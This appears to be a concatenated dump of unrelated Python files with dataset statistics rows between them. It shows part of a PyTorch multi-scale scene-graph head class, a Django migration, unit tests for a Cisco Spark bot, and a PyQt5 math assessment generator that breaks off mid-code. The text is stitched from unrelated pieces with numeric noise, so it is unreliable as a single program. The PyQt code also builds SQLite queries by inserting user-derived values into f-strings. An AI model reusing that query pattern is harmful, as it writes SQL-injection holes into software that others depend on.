targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(features):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_name = self.out_names[i]
loss, pred = self._forward(features_per_scale, targets_per_scale)
loss = {k + cur_name: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds[-1]
@HEADS_REGISTRY.register()
class MultiScaleCascadeHeads(CenternetCascadeHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
# self.head = CenternetRelationHeads(cfg, input_shape)
# the strides to downsample the gt, [1, 2, 4, 8]
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
def _forward(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(features):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward(features_per_scale, targets_per_scale)
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds
| 44.753325
| 123
| 0.568101
| 4,122
| 37,011
| 4.854682
| 0.065987
| 0.027985
| 0.040927
| 0.045875
| 0.884264
| 0.879166
| 0.867573
| 0.860926
| 0.85428
| 0.849483
| 0
| 0.003653
| 0.341736
| 37,011
| 827
| 124
| 44.753325
| 0.817715
| 0.077274
| 0
| 0.84522
| 0
| 0
| 0.022243
| 0.000621
| 0
| 0
| 0
| 0
| 0.027314
| 1
| 0.047041
| false
| 0
| 0.030349
| 0
| 0.124431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8592dc91d5619a73422841e401fd7c656cde7e1f
| 1,894
|
py
|
Python
|
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | null | null | null |
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | 3
|
2021-03-30T14:08:27.000Z
|
2021-06-04T23:48:08.000Z
|
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.5 on 2020-06-21 01:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('JIT', '0025_auto_20200621_0124'),
]
operations = [
migrations.AddField(
model_name='tiponoticia',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AddField(
model_name='tipoproyecto',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AddField(
model_name='tiposervicio',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='equipo',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='noticia',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='paso_filosofia',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='post_blog',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='proyecto',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
migrations.AlterField(
model_name='servicio',
name='public',
field=models.BooleanField(default=False, verbose_name='¿Público?'),
),
]
| 32.101695
| 79
| 0.56811
| 175
| 1,894
| 6.068571
| 0.28
| 0.076271
| 0.127119
| 0.177966
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0
| 0.02352
| 0.304118
| 1,894
| 58
| 80
| 32.655172
| 0.775417
| 0.023759
| 0
| 0.692308
| 1
| 0
| 0.134272
| 0.012453
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4309ad8575d1f0671bce9469eb6c05d965e7b49
| 6,455
|
py
|
Python
|
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | 1
|
2020-02-23T14:55:56.000Z
|
2020-02-23T14:55:56.000Z
|
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from ciscosparkbot import SparkBot
import requests_mock
from .spark_mock import MockSparkAPI
class SparkBotTests(unittest.TestCase):
@requests_mock.mock()
def setUp(self, m):
m.get('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.list_webhooks())
m.post('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.create_webhook())
bot_email = "test@test.com"
spark_token = "somefaketoken"
bot_url = "http://fakebot.com"
bot_app_name = "testbot"
# Create a new bot
bot = SparkBot(bot_app_name,
spark_bot_token=spark_token,
spark_bot_url=bot_url,
spark_bot_email=bot_email,
debug=True)
# Add new command
bot.add_command('/dosomething',
'help for do something',
self.do_something)
bot.testing = True
self.app = bot.test_client()
def do_something(self, incoming_msg):
"""
Sample function to do some action.
:param incoming_msg: The incoming message object from Spark
:return: A text or markdown based reply
"""
return "i did what you said - {}".format(incoming_msg.text)
@requests_mock.mock()
def test_webhook_already_exists(self, m):
m.get('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.list_webhooks_exist())
m.post('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.create_webhook())
bot_email = "test@test.com"
spark_token = "somefaketoken"
bot_url = "http://fakebot.com"
bot_app_name = "testbot"
# Create a new bot
bot = SparkBot(bot_app_name,
spark_bot_token=spark_token,
spark_bot_url=bot_url,
spark_bot_email=bot_email,
debug=True)
# Add new command
bot.add_command('/dosomething',
'help for do something',
self.do_something)
bot.testing = True
self.app = bot.test_client()
@requests_mock.mock()
def test_bad_config_raises_valueerror(self, m):
with self.assertRaises(ValueError):
m.get('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.list_webhooks_exist())
m.post('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.create_webhook())
bot_email = None
spark_token = "somefaketoken"
bot_url = "http://fakebot.com"
bot_app_name = "testbot"
# Create a new bot
bot = SparkBot(bot_app_name,
spark_bot_token=spark_token,
spark_bot_url=bot_url,
spark_bot_email=bot_email,
debug=True)
# Add new command
bot.add_command('/dosomething',
'help for do something',
self.do_something)
bot.testing = True
self.app = bot.test_client()
@requests_mock.mock()
def test_spark_setup(self, m):
m.get('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.list_webhooks())
m.post('https://api.ciscospark.com/v1/webhooks',
json=MockSparkAPI.create_webhook())
def test_health_endpoint(self):
resp = self.app.get('/health')
self.assertEqual(resp.status_code, 200)
self.assertIn(b"I'm Alive", resp.data)
def test_config_endpoint(self):
resp = self.app.get('/config')
self.assertEqual(resp.status_code, 200)
self.assertIn(b"test@test.com", resp.data)
@requests_mock.mock()
def test_process_incoming_message_send_help(self, m):
m.get('//api.ciscospark.com/v1/people/me', json=MockSparkAPI.me())
m.get('//api.ciscospark.com/v1/messages/incoming_message_id',
json=MockSparkAPI.get_message_help())
m.post('//api.ciscospark.com/v1/messages', json={})
resp = self.app.post('/',
data=MockSparkAPI.incoming_msg(),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
print(resp.data)
self.assertIn(b'I understand the following commands', resp.data)
@requests_mock.mock()
def test_process_incoming_message_default_command(self, m):
m.get('//api.ciscospark.com/v1/people/me', json=MockSparkAPI.me())
m.get('//api.ciscospark.com/v1/messages/incoming_message_id',
json=MockSparkAPI.empty_message())
m.post('//api.ciscospark.com/v1/messages', json={})
resp = self.app.post('/',
data=MockSparkAPI.incoming_msg(),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
print(resp.data)
self.assertIn(b'I understand the following commands', resp.data)
@requests_mock.mock()
def test_process_incoming_message_match_command(self, m):
m.get('//api.ciscospark.com/v1/people/me', json=MockSparkAPI.me())
m.get('//api.ciscospark.com/v1/messages/incoming_message_id',
json=MockSparkAPI.get_message_dosomething())
m.post('//api.ciscospark.com/v1/messages', json={})
resp = self.app.post('/',
data=MockSparkAPI.incoming_msg(),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
print(resp.data)
# self.assertIn(b'I understand the following commands', resp.data)
@requests_mock.mock()
def test_process_incoming_message_from_bot(self, m):
m.get('//api.ciscospark.com/v1/people/me', json=MockSparkAPI.me())
m.get('//api.ciscospark.com/v1/messages/incoming_message_id',
json=MockSparkAPI.get_message_from_bot())
m.post('//api.ciscospark.com/v1/messages', json={})
resp = self.app.post('/',
data=MockSparkAPI.incoming_msg(),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
print(resp.data)
def tearDown(self):
pass
| 39.845679
| 74
| 0.58172
| 738
| 6,455
| 4.892954
| 0.154472
| 0.072002
| 0.088618
| 0.099695
| 0.845195
| 0.838826
| 0.824425
| 0.824425
| 0.824425
| 0.799502
| 0
| 0.008435
| 0.302091
| 6,455
| 161
| 75
| 40.093168
| 0.793119
| 0.046321
| 0
| 0.776923
| 0
| 0
| 0.197872
| 0.076596
| 0
| 0
| 0
| 0
| 0.084615
| 1
| 0.092308
| false
| 0.007692
| 0.030769
| 0
| 0.138462
| 0.030769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a6b49241cdbacedc137e80e687d480fe08897d
| 93,431
|
py
|
Python
|
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
import textract
import source
import csv
import sqlite3
import shutil
import os
import webbrowser
import platform
import subprocess
import numpy as np
import pandas as pd
from ualreadyexist import *
class Ui_NewAssessment(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(895, 700)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.TitleS = QtWidgets.QLabel(self.centralwidget)
self.TitleS.setGeometry(QtCore.QRect(470, 40, 125, 25))
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TitleS.setObjectName("Title")
self.TypeS = QtWidgets.QLabel(self.centralwidget)
self.TypeS.setGeometry(QtCore.QRect(600, 40, 100, 25))
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setObjectName("Type")
self.Ques = QtWidgets.QLabel(self.centralwidget)
self.Ques.setGeometry(QtCore.QRect(695, 40, 90, 25))
self.Ques.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.Ques.setObjectName("Ques")
self.label0 = QtWidgets.QLabel(self.centralwidget)
self.label0.setStyleSheet("color:rgb(255, 255, 255);")
self.label0.setGeometry(QtCore.QRect(20, 20, 95, 18))
self.label0.setObjectName("label0")
self.label1 = QtWidgets.QLineEdit(self.centralwidget)
self.label1.setStyleSheet("color:rgb(25, 25, 25);")
self.label1.setGeometry(QtCore.QRect(200, 170, 133, 25))
self.label1.setObjectName("label1")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setStyleSheet("font: 11pt \"Arial\";")
self.label.setGeometry(QtCore.QRect(80, 50, 95, 18))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(80, 90, 180, 18))
self.label_2.setStyleSheet("font: 11pt \"Arial\";")
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(80, 130, 180, 18))
self.label_3.setStyleSheet("font: 11pt \"Arial\";")
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(80, 170, 180, 18))
self.label_4.setStyleSheet("font: 11pt \"Arial\";")
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(80, 210, 111, 18))
self.label_5.setStyleSheet("font: 11pt \"Arial\";")
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(80, 250, 111, 18))
self.label_6.setStyleSheet("font: 11pt \"Arial\";")
self.label_6.setObjectName("label_6")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(80, 290, 111, 18))
self.label_8.setStyleSheet("font: 11pt \"Arial\";")
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(80, 330, 111, 18))
self.label_9.setStyleSheet("font: 11pt \"Arial\";")
self.label_9.setObjectName("label_9")
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(80, 370, 111, 18))
self.label_10.setStyleSheet("font: 11pt \"Arial\";")
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(80, 410, 170, 18))
self.label_11.setStyleSheet("font: 11pt \"Arial\";")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(80, 450, 170, 18))
self.label_12.setStyleSheet("font: 11pt \"Arial\";")
self.label_12.setObjectName("label_12")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(80, 490, 170, 18))
self.label_13.setStyleSheet("font: 11pt \"Arial\";")
self.label_13.setObjectName("label_13")
self.label_15 = QtWidgets.QLabel(self.centralwidget)
self.label_15.setGeometry(QtCore.QRect(80, 530, 170, 18))
self.label_15.setStyleSheet("font: 11pt \"Arial\";")
self.label_15.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(20, 580, 170, 18))
self.label_14.setStyleSheet("font: 11pt \"Arial\";")
self.label_14.setObjectName("label_13")
self.col = ['Questions', 'QDescription']
self.tableView = QtWidgets.QTableWidget(self.centralwidget)
self.tableView.setGeometry(QtCore.QRect(450, 100, 391, 401))
self.tableView.setColumnCount(2)
self.tableView.setHorizontalHeaderLabels(self.col)
self.tableView.setObjectName("tableWidget")
#self.tableWidget.setColumnCount(0)
#self.tableWidget.setRowCount(0)
self.comboBox = QtWidgets.QComboBox(self.centralwidget)
self.comboBox.setGeometry(QtCore.QRect(200, 50, 151, 25))
self.comboBox.addItem("Linear Algebra")
self.comboBox.addItem("Calculus")
self.comboBox.addItem("Probability")
self.comboBox.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox.setObjectName("comboBox")
self.comboBox_2 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_2.setGeometry(QtCore.QRect(230, 90, 151, 25))
self.comboBox_2.addItem("Subjective")
self.comboBox_2.addItem("Objective")
self.comboBox_2.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_2.setObjectName("comboBox_2")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(240, 130, 133, 25))
self.lineEdit.setObjectName("lineEdit")
self.lineEdit_3 = QtWidgets.QDateEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(130, 210, 133, 25))
self.lineEdit_3.setObjectName("lineEdit_3")
self.lineEdit_4 = QtWidgets.QTimeEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(130, 250, 133, 25))
self.lineEdit_4.setObjectName("lineEdit_4")
#self.lineEdit_5 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_5.setGeometry(QtCore.QRect(200, 290, 133, 25))
#self.lineEdit_5.setObjectName("lineEdit_5")
self.comboBox_6 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_6.setGeometry(QtCore.QRect(200, 290, 133, 25))
self.comboBox_6.addItem("Linear Algebra")
self.comboBox_6.addItem("Calculus")
self.comboBox_6.addItem("Probability")
self.comboBox_6.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_6.setObjectName("comboBox_6")
#self.lineEdit_6 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_6.setGeometry(QtCore.QRect(180, 330, 133, 25))
#self.lineEdit_6.setObjectName("lineEdit_6")
self.comboBox_5 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_5.setGeometry(QtCore.QRect(180, 330, 133, 25))
self.comboBox_5.addItem("CSN103, SEN103")
self.comboBox_5.addItem("CSN102, SEN102")
self.comboBox_5.addItem("CSN201, SEN201")
self.comboBox_5.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_5.setObjectName("comboBox_5")
self.lineEdit_8 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_8.setGeometry(QtCore.QRect(180, 370, 133, 25))
self.lineEdit_8.setObjectName("lineEdit_8")
#self.lineEdit_9 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_9.setGeometry(QtCore.QRect(250, 410, 133, 25))
#self.lineEdit_9.setObjectName("lineEdit_9")
self.comboBox_4 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_4.setGeometry(QtCore.QRect(250, 410, 133, 25))
self.comboBox_4.addItem("Midterm")
self.comboBox_4.addItem("Finalterm")
self.comboBox_4.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_4.setObjectName("comboBox_4")
self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_3.setGeometry(QtCore.QRect(250, 450, 133, 25))
self.comboBox_3.addItem("Spring 2021")
self.comboBox_3.addItem("Fall 2021")
self.comboBox_3.addItem("Summer2021")
self.comboBox_3.addItem("Spring 2022")
self.comboBox_3.addItem("Fall 2022")
self.comboBox_3.addItem("Summer 2022")
self.comboBox_3.addItem("Spring 2023")
self.comboBox_3.addItem("Fall 2023")
self.comboBox_3.addItem("Summer 2023")
self.comboBox_3.addItem("Spring 2024")
self.comboBox_3.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_3.setObjectName("comboBox_3")
self.lineEdit_11 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_11.setGeometry(QtCore.QRect(200, 490, 133, 25))
self.lineEdit_11.setObjectName("lineEdit_11")
self.lineEdit_13 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_13.setGeometry(QtCore.QRect(200, 530, 133, 25))
self.lineEdit_13.setObjectName("lineEdit_12")
self.lineEdit_12 = QtWidgets.QTextEdit(self.centralwidget)
self.lineEdit_12.setGeometry(QtCore.QRect(200, 580, 220, 80))
self.lineEdit_12.setObjectName("lineEdit_12")
self.GenerateDoc = QtWidgets.QPushButton(self.centralwidget)
self.GenerateDoc.setGeometry(QtCore.QRect(650, 530, 170, 35))
self.GenerateDoc.setObjectName("generate")
self.GenerateDoc.setStyleSheet("QPushButton#generate{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#generate:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#generate:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.RandomSearch = QtWidgets.QPushButton(self.centralwidget)
self.RandomSearch.setGeometry(QtCore.QRect(490, 530, 130, 35))
self.RandomSearch.setObjectName("random")
self.RandomSearch.setStyleSheet("QPushButton#random{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#random:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#random:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.AllFetch = QtWidgets.QPushButton(self.centralwidget)
self.AllFetch.setGeometry(QtCore.QRect(560, 580, 130, 35))
self.AllFetch.setObjectName("random")
self.AllFetch.setStyleSheet("QPushButton#random{\n"
" background-color: rgb(2, 114, 118);\n"
" font: 10pt \"Arial\";\n"
" color: rgba(255, 255, 255, 200);\n"
" border-radius: 10px;\n"
"}\n"
"\n"
"QPushButton#random:pressed{\n"
" padding-left:5px;\n"
" padding-top:5px;\n"
" background-color:rgba(255, 107, 107, 255);\n"
" background-position:calc(100% . 10px)center;\n"
"}\n"
"\n"
"QPushButton#random:hover{\n"
" background-color: rgba(255, 255, 255, 255);\n"
" color:rgb(2, 114, 118);\n"
" border:2px solid;\n"
" border-color:rgb(2, 114, 118);\n"
"}\n"
"\n"
"")
self.RandomSearch.clicked.connect(self.viewRandomly)
self.GenerateDoc.clicked.connect(self.save_var_latex)
self.AllFetch.clicked.connect(self.fullfecth)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def save_var_latex(self):
try:
self.sub = str(self.comboBox.currentText())
self.typ = str(self.comboBox_2.currentText())
self.tn = str(self.label1.text())
self.d = str(self.lineEdit_3.date().toPyDate())
self.t = str(self.lineEdit_4.time().toPyTime())
self.cc = str(self.comboBox_6.currentText())
self.ct = str(self.comboBox_5.currentText())
self.tm = str(self.lineEdit_8.text())
self.et = str(self.comboBox_4.currentText())
self.Sy = str(self.comboBox_3.currentText())
self.est = str(self.lineEdit_11.text())
self.ifs = str(self.lineEdit_12.toPlainText())
paths = []
self.selected = self.tableView.selectedItems()
print(self.selected)
if self.selected:
print("go")
for item in self.selected:
print("go")
print(item.column())
if item.column() == 1:
print(item.column())
print("go")
paths.append(item.data(0))
print("go")
else:
print('select the rows')
print(paths)
print(len(paths))
#\Objective \\\\\\\\\\\\\\\\\\\\\\\Objective \\\\\\\\\\\\\\\\\\\\\\\\\ Objective
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 1 Row Selected
if len(paths) == 1 and self.typ == "Objective":
self.val1 = paths[0]
print(self.val1)
self.comma = self.val1.count(',')
print(self.comma)
self.dic = self.val1.split(',', self.comma)
print(self.dic)
self.spli = f'sj'
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
